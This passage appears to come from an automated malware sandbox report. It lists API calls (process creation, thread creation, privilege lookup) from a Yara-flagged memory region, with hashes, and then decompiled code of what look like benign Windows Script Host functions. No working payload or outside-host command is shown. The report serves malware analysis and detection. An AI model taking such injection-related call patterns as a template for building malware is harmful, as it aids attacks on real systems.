                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0007AD62
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0008A734
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateInternalProcess
                                                        • String ID:
                                                        • API String ID: 2186235152-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0008A734
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateInternalProcess
                                                        • String ID:
                                                        • API String ID: 2186235152-0
                                                        • Opcode ID: dc4b5a66591aad0aa907e8021c5e53538361f01262fa79cd02e07bb58aad7ac5
                                                        • Instruction ID: cc461e37212844c3347e23622562538864990def5d1c5a68a02c4542a8db76f5
                                                        • Opcode Fuzzy Hash: dc4b5a66591aad0aa907e8021c5e53538361f01262fa79cd02e07bb58aad7ac5
                                                        • Instruction Fuzzy Hash: 1001B2B2200108BFDB54DF89DD80EEB37ADAF8C754F158258FA0DA7245C630E851CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0007F050,?,?,00000000), ref: 000891EC
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateThread
                                                        • String ID:
                                                        • API String ID: 2422867632-0
                                                        • Opcode ID: ecacb28e533d931049fcac73acfce2faf05e3b67876ae05ce95fa90aefa457bb
                                                        • Instruction ID: c601f2e2ae289350187f167b9d80c2559b345b0e0d31d68b964759fd6f4e173f
                                                        • Opcode Fuzzy Hash: ecacb28e533d931049fcac73acfce2faf05e3b67876ae05ce95fa90aefa457bb
                                                        • Instruction Fuzzy Hash: F0E06D373802043AE62075A9AC02FE7B29CAB81B20F150026FA4DEA2C2D995F80142A4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0007F050,?,?,00000000), ref: 000891EC
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateThread
                                                        • String ID:
                                                        • API String ID: 2422867632-0
                                                        • Opcode ID: b03f41141c25b12212c33b112582574a5b123177ad4014a31a4dff1abd74324a
                                                        • Instruction ID: 19c69f28d91094c42253454846901aed39ed219de880d771c7081ebbcd4bfca9
                                                        • Opcode Fuzzy Hash: b03f41141c25b12212c33b112582574a5b123177ad4014a31a4dff1abd74324a
                                                        • Instruction Fuzzy Hash: B4F0E5373402017EE33079589C03FE7B358EF90B10F240018F689AB6C1CAA1F80183A4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0007F1D2,0007F1D2,?,00000000,?,?), ref: 0008A800
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: 081c446ee6c5013a380d85e7529561e9b8f2fe0a5acc0c68a6b2895574bcc5a6
                                                        • Instruction ID: 173b01b810155d408be191f05a3d66c5e8c8889141a553b13f481c21f0bcb6b4
                                                        • Opcode Fuzzy Hash: 081c446ee6c5013a380d85e7529561e9b8f2fe0a5acc0c68a6b2895574bcc5a6
                                                        • Instruction Fuzzy Hash: 51F0E5B12002046FD710DF69CC41EE7B7B9EF85200F048169FD0897702C530981987B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00084536,?,00084CAF,00084CAF,?,00084536,?,?,?,?,?,00000000,00000000,?), ref: 0008A65D
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                        • Instruction ID: e4a3b5555a0ecd646342859cfd2bfc0e18779972e92a541dd2b9e21fbb41912f
                                                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                        • Instruction Fuzzy Hash: ADE012B1200208ABDB14EF99CC41EA777ACEF88654F118559BA085B242C630F9108BB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0007F1D2,0007F1D2,?,00000000,?,?), ref: 0008A800
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                        • Instruction ID: 309186c580a382a61ffb9c83d2a66c2228bcd0ac1c2c8a2cf842a7d5d9f71115
                                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                        • Instruction Fuzzy Hash: 8CE01AB12002086BDB10EF89CC85EE737ADEF89650F118165BA0857242C934E8108BF5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetErrorMode.KERNELBASE(00008003,?,00078D14,?), ref: 0007F6FB
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                        • Instruction ID: 2b497bff48ec278f26eba221411dd280b8d181ac00b0d1e7ba025ff9b24c22e2
                                                        • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                        • Instruction Fuzzy Hash: 9BD05E616503092AE610BAA49C03F6632C86B44B04F4A4064FA48962C3E954E4014165
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        C-Code - Quality: 79%
                                                        			E00B8386A(void* __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
                                                        				signed int _v8;
                                                        				short _v524;
                                                        				int _v528;
                                                        				int _v532;
                                                        				int _v536;
                                                        				long _v540;
                                                        				long _v544;
                                                        				int _v548;
                                                        				int _v552;
                                                        				int _v556;
                                                        				long _v560;
                                                        				long _v564;
                                                        				int _v568;
                                                        				WCHAR* _v572;
                                                        				union _SID_NAME_USE _v576;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t66;
                                                        				int _t75;
                                                        				void* _t78;
                                                        				int _t80;
                                                        				int _t86;
                                                        				signed int _t87;
                                                        				WCHAR* _t88;
                                                        				int _t91;
                                                        				signed int _t109;
                                                        				void* _t110;
                                                        				void* _t112;
                                                        				void* _t113;
                                                        				signed int _t117;
                                                        				intOrPtr _t118;
                                                        
                                                        				_t108 = __edx;
                                                        				_t66 =  *0xb97004; // 0xbb40e64e
                                                        				_t67 = _t66 ^ _t117;
                                                        				_v8 = _t66 ^ _t117;
                                                        				_t118 =  *0xb97001; // 0x0
                                                        				if(_t118 == 0) {
                                                        					L8:
                                                        					return E00B81335(_t67, 0, _v8 ^ _t117, _t108, _t110, _t113);
                                                        				}
                                                        				_push(_t113);
                                                        				_push(_t110);
                                                        				_v564 = 0x100;
                                                        				_v552 = 0;
                                                        				_v528 = 0;
                                                        				_v544 = 0;
                                                        				_v540 = 0;
                                                        				_v548 = 0;
                                                        				_v532 = 0;
                                                        				_v536 = 0;
                                                        				E00B83415(__ecx, __edx, 0x80000001, L"Software\\Microsoft\\Windows Script Host\\Settings", 0x20019,  &_v532);
                                                        				E00B83415(__ecx, __edx, 0x80000002, L"Software\\Microsoft\\Windows Script Host\\Settings", 0x20019,  &_v536);
                                                        				if(_a4 != 0) {
                                                        					_t67 = E00B83249(__ecx, L"LogSecurityFailures", _v532, _v536, 1);
                                                        					__eflags = _t67;
                                                        					if(_t67 == 0) {
                                                        						L3:
                                                        						__imp__#6(_v548);
                                                        						if(_v536 != 0) {
                                                        							_t67 = RegCloseKey(_v536);
                                                        						}
                                                        						if(_v532 != 0) {
                                                        							_t67 = RegCloseKey(_v532);
                                                        						}
                                                        						_pop(_t110);
                                                        						_pop(_t113);
                                                        						goto L8;
                                                        					} else {
                                                        						_v560 = 0xc0ff03e8;
                                                        						_v556 = 0x10;
                                                        						L12:
                                                        						_t112 = RegisterEventSourceW(0, L"Windows Script Host");
                                                        						__eflags = _t112;
                                                        						if(_t112 != 0) {
                                                        							_t75 = GetUserNameW( &_v524,  &_v564);
                                                        							__eflags = _t75;
                                                        							if(_t75 != 0) {
                                                        								_t86 = LookupAccountNameW(0,  &_v524, 0,  &_v540, 0,  &_v544,  &_v576);
                                                        								__eflags = _v540;
                                                        								if(_v540 > 0) {
                                                        									__eflags = _v544;
                                                        									if(__eflags > 0) {
                                                        										_push(_v540);
                                                        										L00B82877();
                                                        										_v528 = _t86;
                                                        										_t87 = _v544;
                                                        										_t109 = 2;
                                                        										_t108 = _t87 * _t109 >> 0x20;
                                                        										_t88 = _t87 * _t109;
                                                        										_push( ~(0 | __eflags > 0x00000000) | _t88);
                                                        										L00B82877();
                                                        										_v552 = _t88;
                                                        										_t91 = LookupAccountNameW(0,  &_v524, _v528,  &_v540, _t88,  &_v544,  &_v576);
                                                        										__eflags = _t91;
                                                        										if(_t91 == 0) {
                                                        											_push(_v528);
                                                        											L00B82082();
                                                        											_v528 = 0;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        							E00B83A91(_t108,  &_v548, _a8);
                                                        							_t78 = _v548;
                                                        							__eflags = _t78;
                                                        							if(_t78 != 0) {
                                                        								_v572 = _t78;
                                                        								_v568 = 0;
                                                        								_t80 = 1;
                                                        								__eflags = 1;
                                                        							} else {
                                                        								_v572 = 0;
                                                        								_t80 = 0;
                                                        							}
                                                        							ReportEventW(_t112, _v556, 0, _v560, _v528, _t80, 0,  &_v572, 0);
                                                        							_t67 = DeregisterEventSource(_t112);
                                                        							__eflags = _v528;
                                                        							if(_v528 != 0) {
                                                        								_push(_v528);
                                                        								L00B82082();
                                                        							}
                                                        							__eflags = _v552;
                                                        							if(_v552 != 0) {
                                                        								_push(_v552);
                                                        								L00B82082();
                                                        							}
                                                        						}
                                                        						goto L3;
                                                        					}
                                                        				}
                                                        				if(E00B83249(__ecx, L"LogSecuritySuccesses", _v532, _v536, 0) != 0) {
                                                        					_v560 = 0xff03e9;
                                                        					_v556 = 8;
                                                        					goto L12;
                                                        				}
                                                        				goto L3;
                                                        			}

                                                        APIs
                                                          • Part of subcall function 00B83415: RegOpenKeyExW.ADVAPI32 ref: 00B83444
                                                        • SysFreeString.OLEAUT32(?), ref: 00B83922
                                                        • RegCloseKey.ADVAPI32(?), ref: 00B8393C
                                                        • RegCloseKey.ADVAPI32(?), ref: 00B8394C
                                                        • RegisterEventSourceW.ADVAPI32(00000000,Windows Script Host), ref: 00B88241
                                                        • GetUserNameW.ADVAPI32(?,00000100), ref: 00B8825F
                                                        • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00B88292
                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00B882AA
                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00B882CA
                                                        • LookupAccountNameW.ADVAPI32(00000000,?,?,?,00000000,?,?), ref: 00B882FB
                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00B88307
                                                        • ReportEventW.ADVAPI32(00000000,00000010,00000000,C0FF03E8,?,00000001,00000000,?,00000000), ref: 00B88363
                                                        • DeregisterEventSource.ADVAPI32(00000000), ref: 00B8836A
                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00B8837E
                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00B88396
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ??3@EventName$??2@AccountCloseLookupSource$DeregisterFreeOpenRegisterReportStringUser
                                                        • String ID: LogSecurityFailures$LogSecuritySuccesses$Software\Microsoft\Windows Script Host\Settings$Windows Script Host
                                                        • API String ID: 1767439359-2261343319
                                                        • Opcode ID: d000033242533f3bcbebb4e6e33d722efe76200794faee279b9656f103364f59
                                                        • Instruction ID: bfc37acdf8a8f1217c3e1f328ced58c0f9aa5c145445cc3d63d4bb51cd369fc3
                                                        • Opcode Fuzzy Hash: d000033242533f3bcbebb4e6e33d722efe76200794faee279b9656f103364f59
                                                        • Instruction Fuzzy Hash: FF611BB284122DAFCF21AF54DC89AEEB7F8EB18700F5041EAF109A2161DA745F85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 84%
                                                        			E00B83030(void* __ebx, void* __edi) {
                                                        				signed int _v8;
                                                        				char _v14;
                                                        				char _v16;
                                                        				char _v276;
                                                        				char _v536;
                                                        				char _v796;
                                                        				char _v1056;
                                                        				void* __esi;
                                                        				signed int _t33;
                                                        				void* _t35;
                                                        				signed int _t38;
                                                        				void* _t39;
                                                        				void* _t41;
                                                        				void* _t43;
                                                        				int _t57;
                                                        				void* _t61;
                                                        				void* _t82;
                                                        				signed short _t87;
                                                        				void* _t94;
                                                        				void* _t96;
                                                        				int _t97;
                                                        				signed int _t99;
                                                        				void* _t100;
                                                        				void* _t101;
                                                        
                                                        				_t94 = __edi;
                                                        				_t82 = __ebx;
                                                        				_t33 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t33 ^ _t99;
                                                        				_t35 =  *0xb97020; // 0x0
                                                        				if(_t35 != 0) {
                                                        					L6:
                                                        					return E00B81335(_t35, _t82, _v8 ^ _t99, 1, _t94, _t96);
                                                        				}
                                                        				_push(_t96);
                                                        				_t97 = GetUserDefaultLCID();
                                                        				_t87 = _t97 & 0x000003ff;
                                                        				_t38 = _t87 & 0x0000ffff;
                                                        				if(1 == _t38) {
                                                        					L7:
                                                        					__eflags =  *0xb9702c - 0x7d0;
                                                        					if( *0xb9702c == 0x7d0) {
                                                        						L4:
                                                        						_t35 =  *0xb9701c; // 0x0
                                                        						L5:
                                                        						_pop(_t96);
                                                        						goto L6;
                                                        					}
                                                        					 *0xb974c4 = 0x180000;
                                                        					L3:
                                                        					if( *0xb97000 == 0) {
                                                        						_t39 = 9;
                                                        						__eflags = _t39 - _t87;
                                                        						if(_t39 == _t87) {
                                                        							goto L4;
                                                        						}
                                                        						_push(_t82);
                                                        						_push(_t94);
                                                        						_t35 = E00B93470(_t82,  *0xb9701c, _t97);
                                                        						__eflags = _t35 -  *0xb9701c; // 0x0
                                                        						if(__eflags != 0) {
                                                        							__eflags = _t35;
                                                        							if(_t35 != 0) {
                                                        								L26:
                                                        								_pop(_t94);
                                                        								_pop(_t82);
                                                        								goto L5;
                                                        							}
                                                        							L13:
                                                        							_t41 = GetLocaleInfoA(_t97, 3,  &_v16, 5);
                                                        							__eflags = _t41;
                                                        							if(_t41 != 0) {
                                                        								_t43 = LoadStringA( *0xb9701c, 0x3e9,  &_v796, 0x104);
                                                        								__eflags = _t43;
                                                        								if(_t43 == 0) {
                                                        									goto L14;
                                                        								}
                                                        								_push( &_v16);
                                                        								_t83 = "%s%s.DLL";
                                                        								E00B8F861( &_v276, 0x104, "%s%s.DLL",  &_v796);
                                                        								_t101 = _t100 + 0x14;
                                                        								GetModuleFileNameA( *0xb9701c,  &_v1056, 0x104);
                                                        								E00B934DC(0x104,  &_v1056,  &_v276,  &_v536);
                                                        								_t35 = LoadLibraryExA( &_v536, 0, 2);
                                                        								__eflags = _t35;
                                                        								if(_t35 != 0) {
                                                        									goto L26;
                                                        								}
                                                        								_t35 = LoadLibraryExA( &_v276, _t35, 2);
                                                        								__eflags = _t35;
                                                        								if(_t35 != 0) {
                                                        									goto L26;
                                                        								}
                                                        								_t57 = lstrlenA( &_v16);
                                                        								__eflags = _t57 - 2;
                                                        								if(_t57 <= 2) {
                                                        									L21:
                                                        									_t61 = GetLocaleInfoA(GetUserDefaultLCID() & 0x000003ff | 0x00000400, 3,  &_v16, 5);
                                                        									__eflags = _t61;
                                                        									if(_t61 == 0) {
                                                        										goto L14;
                                                        									}
                                                        									_push( &_v16);
                                                        									E00B8CE81( &_v276, 0x104, _t83,  &_v796);
                                                        									E00B934DC(0x104,  &_v1056,  &_v276,  &_v536);
                                                        									_t35 = LoadLibraryExA( &_v536, 0, 2);
                                                        									__eflags = _t35;
                                                        									if(_t35 != 0) {
                                                        										goto L26;
                                                        									}
                                                        									_t35 = LoadLibraryExA( &_v276, _t35, 2);
                                                        									L24:
                                                        									__eflags = _t35;
                                                        									if(_t35 == 0) {
                                                        										_t35 =  *0xb9701c; // 0x0
                                                        									}
                                                        									goto L26;
                                                        								}
                                                        								_push( &_v16);
                                                        								_v14 = 0;
                                                        								E00B8CE81( &_v276, 0x104, "%s%s.DLL",  &_v796);
                                                        								_t101 = _t101 + 0x14;
                                                        								E00B934DC(0x104,  &_v1056,  &_v276,  &_v536);
                                                        								_t35 = LoadLibraryExA( &_v536, 0, 2);
                                                        								__eflags = _t35;
                                                        								if(_t35 != 0) {
                                                        									goto L26;
                                                        								}
                                                        								_t35 = LoadLibraryExA( &_v276, _t35, 2);
                                                        								__eflags = _t35;
                                                        								if(_t35 != 0) {
                                                        									goto L26;
                                                        								}
                                                        								goto L21;
                                                        							}
                                                        							L14:
                                                        							_t35 =  *0xb97020; // 0x0
                                                        							goto L24;
                                                        						}
                                                        						_push(_t35);
                                                        						E00B94606();
                                                        						goto L13;
                                                        					}
                                                        					goto L4;
                                                        				}
                                                        				_push(0xd);
                                                        				_pop(1);
                                                        				if(1 == _t38) {
                                                        					goto L7;
                                                        				}
                                                        				goto L3;
                                                        			}

                                                        APIs
                                                        • GetUserDefaultLCID.KERNEL32(?), ref: 00B8304F
                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,00000000,00000000,00000000), ref: 00B89333
                                                        • LoadStringA.USER32 ref: 00B8935F
                                                        • GetModuleFileNameA.KERNEL32(?,00000104), ref: 00B89398
                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?), ref: 00B893CA
                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002), ref: 00B893DE
                                                        • lstrlenA.KERNEL32(?), ref: 00B893EC
                                                        • ___swprintf_l.LIBCMT ref: 00B8940F
                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?), ref: 00B8943D
                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002), ref: 00B89451
                                                        • GetUserDefaultLCID.KERNEL32 ref: 00B8945B
                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005), ref: 00B89474
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: Load$Library$DefaultInfoLocaleUser$FileModuleNameString___swprintf_llstrlen
                                                        • String ID: %s%s.DLL
                                                        • API String ID: 1568835780-4110387156
                                                        • Opcode ID: 06114f245d2f664810d6ea13fcdc2a8152d8a46f910353a2a7445abf22700296
                                                        • Instruction ID: 621d28467fc87bfc4dc3c0b3e4421cd52973115665eacd6b5bc002923998fe31
                                                        • Opcode Fuzzy Hash: 06114f245d2f664810d6ea13fcdc2a8152d8a46f910353a2a7445abf22700296
                                                        • Instruction Fuzzy Hash: AD5142B295011DAADB21E794DC85FEA77ECEB18B00F4444E6B605E31A1EA70DB85CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 85%
                                                        			E00B82CB9(void* __edx, short* _a4, long* _a8, va_list* _a12) {
                                                        				signed int _v8;
                                                        				long _v12;
                                                        				char _v16;
                                                        				short _v20;
                                                        				char* _v24;
                                                        				void* _v36;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t30;
                                                        				signed int _t33;
                                                        				short* _t45;
                                                        				long _t46;
                                                        				void* _t52;
                                                        				int _t53;
                                                        				void* _t55;
                                                        				signed int _t57;
                                                        				char* _t58;
                                                        				intOrPtr _t60;
                                                        
                                                        				_t52 = __edx;
                                                        				_t30 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t30 ^ _t57;
                                                        				_v12 = 0;
                                                        				_v20 = 0;
                                                        				_v16 = 0;
                                                        				_t60 =  *0xb97001; // 0x0
                                                        				if(_t60 == 0) {
                                                        					_t53 = WideCharToMultiByte(0, 0, _a4, 0xffffffff, 0, 0, 0, 0);
                                                        					if(_t53 == 0) {
                                                        						L8:
                                                        						_t33 = GetLastError();
                                                        						if(_t33 > 0) {
                                                        							_t33 = _t33 & 0x0000ffff | 0x80070000;
                                                        						}
                                                        						_v12 = _t33;
                                                        						L4:
                                                        						_t55 = LocalFree;
                                                        						if(_v16 != 0) {
                                                        							LocalFree(_v16);
                                                        						}
                                                        						if(_v20 != 0) {
                                                        							LocalFree(_v20);
                                                        						}
                                                        						return E00B81335(_v12, 0, _v8 ^ _t57, _t52, _t53, _t55);
                                                        					}
                                                        					E00B8320B(_t32);
                                                        					_v24 = _t58;
                                                        					if(_t58 == 0) {
                                                        						L18:
                                                        						_v12 = 0x8007000e;
                                                        						goto L4;
                                                        					}
                                                        					if(WideCharToMultiByte(0, 0, _a4, 0xffffffff, _v24, _t53, 0, 0) == 0 || FormatMessageA(0x500, _v24, 0, 0,  &_v16, 0, _a12) == 0) {
                                                        						goto L8;
                                                        					} else {
                                                        						_t53 = MultiByteToWideChar(0, 0, _v16, 0xffffffff, 0, 0);
                                                        						if(_t53 == 0) {
                                                        							goto L8;
                                                        						}
                                                        						_t45 = LocalAlloc(0, _t53 + _t53);
                                                        						_v20 = _t45;
                                                        						if(_t45 == 0) {
                                                        							goto L8;
                                                        						}
                                                        						_t46 = MultiByteToWideChar(0, 0, _v16, 0xffffffff, _t45, _t53);
                                                        						L2:
                                                        						if(_t46 == 0) {
                                                        							goto L8;
                                                        						}
                                                        						__imp__#2(_v20);
                                                        						 *_a8 = _t46;
                                                        						if(_t46 == 0) {
                                                        							goto L18;
                                                        						}
                                                        						goto L4;
                                                        					}
                                                        				}
                                                        				_t46 = FormatMessageW(0x500, _a4, 0, 0,  &_v20, 0, _a12);
                                                        				goto L2;
                                                        			}

                                                        APIs
                                                        • FormatMessageW.KERNEL32(00000500,?,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00B8F6DE,?,?,?), ref: 00B82CF7
                                                        • SysAllocString.OLEAUT32(?), ref: 00B82D08
                                                        • LocalFree.KERNEL32(?,?,?,?,00B8F6DE,?,?,?), ref: 00B82D32
                                                        • GetLastError.KERNEL32(?,?,?,00B8F6DE,?,?,?), ref: 00B87D8B
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00B8F6DE,?,?), ref: 00B87DB8
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000000,00000000,00000000,?,?,?,00B8F6DE,?,?,?), ref: 00B87DD9
                                                        • FormatMessageA.KERNEL32(00000500,?,00000000,00000000,00B8F6DE,00000000,?,?,?,?,00B8F6DE,?,?,?), ref: 00B87DF1
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00B8F6DE,000000FF,00000000,00000000,?,?,?,00B8F6DE,?,?,?), ref: 00B87E0A
                                                        • LocalAlloc.KERNEL32(00000000,00000000,?,?,?,00B8F6DE,?,?,?), ref: 00B87E1B
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00B8F6DE,000000FF,00000000,00000000,?,?,?,00B8F6DE,?,?,?), ref: 00B87E35
                                                        • LocalFree.KERNEL32(00B8F6DE,?,?,?,00B8F6DE,?,?,?), ref: 00B87E4B
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$Local$AllocFormatFreeMessage$ErrorLastString
                                                        • String ID:
                                                        • API String ID: 3217630869-0
                                                        • Opcode ID: 4303702fa768670d6e318c165e5de6b8ac230f72705bf64480bd8ddfd78ad25f
                                                        • Instruction ID: 665844f867b3eda9f4df6e2693394e874d77eb6f38c5f5f55eedf6c5e8214078
                                                        • Opcode Fuzzy Hash: 4303702fa768670d6e318c165e5de6b8ac230f72705bf64480bd8ddfd78ad25f
                                                        • Instruction Fuzzy Hash: 02410CB194415EBFDF10AFA48C84DBEBBBDEB04358B2449AAF511A71A0DA308D51DB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 92%
                                                        			E00B8F0D3(void* __edx, WCHAR* _a4) {
                                                        				signed int _v8;
                                                        				struct _WIN32_FIND_DATAA _v328;
                                                        				struct _WIN32_FIND_DATAW _v920;
                                                        				CHAR* _v924;
                                                        				short* _v928;
                                                        				void* _v940;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t15;
                                                        				signed int _t20;
                                                        				long _t23;
                                                        				void* _t26;
                                                        				void* _t33;
                                                        				int _t34;
                                                        				signed int _t36;
                                                        				CHAR* _t37;
                                                        				intOrPtr _t39;
                                                        
                                                        				_t33 = __edx;
                                                        				_t15 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t15 ^ _t36;
                                                        				_t35 = _a4;
                                                        				_v928 = _t35;
                                                        				_t39 =  *0xb97001; // 0x0
                                                        				if(_t39 == 0) {
                                                        					_t35 = WideCharToMultiByte;
                                                        					_t34 = WideCharToMultiByte(0, 0, WideCharToMultiByte, 0xffffffff, 0, 0, 0, 0);
                                                        					if(_t34 != 0) {
                                                        						E00B8320B(_t17);
                                                        						_v924 = _t37;
                                                        						if(WideCharToMultiByte(0, 0, _v928, 0xffffffff, _v924, _t34, 0, 0) == 0) {
                                                        							goto L5;
                                                        						}
                                                        						_t23 = GetFileAttributesA(_v924);
                                                        						if(_t23 != 0xffffffff) {
                                                        							L15:
                                                        							if((_t23 & 0x00000010) == 0) {
                                                        								L14:
                                                        								_t20 = 0;
                                                        								L17:
                                                        								return E00B81335(_t20, 0, _v8 ^ _t36, _t33, _t34, _t35);
                                                        							}
                                                        							L16:
                                                        							_t20 = 0x80070002;
                                                        							goto L17;
                                                        						}
                                                        						if(GetLastError() != 0x20) {
                                                        							goto L16;
                                                        						}
                                                        						_t26 = FindFirstFileA(_v924,  &_v328);
                                                        						L11:
                                                        						if(_t26 == 0 || _t26 == 0xffffffff) {
                                                        							goto L16;
                                                        						} else {
                                                        							FindClose(_t26);
                                                        							goto L14;
                                                        						}
                                                        					}
                                                        					L5:
                                                        					_t20 = GetLastError();
                                                        					if(_t20 > 0) {
                                                        						_t20 = _t20 & 0x0000ffff | 0x80070000;
                                                        					}
                                                        					goto L17;
                                                        				}
                                                        				_t23 = GetFileAttributesW(_t35);
                                                        				if(_t23 != 0xffffffff) {
                                                        					goto L15;
                                                        				}
                                                        				if(GetLastError() != 0x20) {
                                                        					goto L16;
                                                        				}
                                                        				_t26 = FindFirstFileW(_t35,  &_v920);
                                                        				goto L11;
                                                        			}






















                                                        APIs
                                                        • GetFileAttributesW.KERNEL32(?,00000104,?,00000000), ref: 00B8F0FF
                                                        • GetLastError.KERNEL32 ref: 00B8F10E
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00B8F125
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000104,?,00000000), ref: 00B8F13F
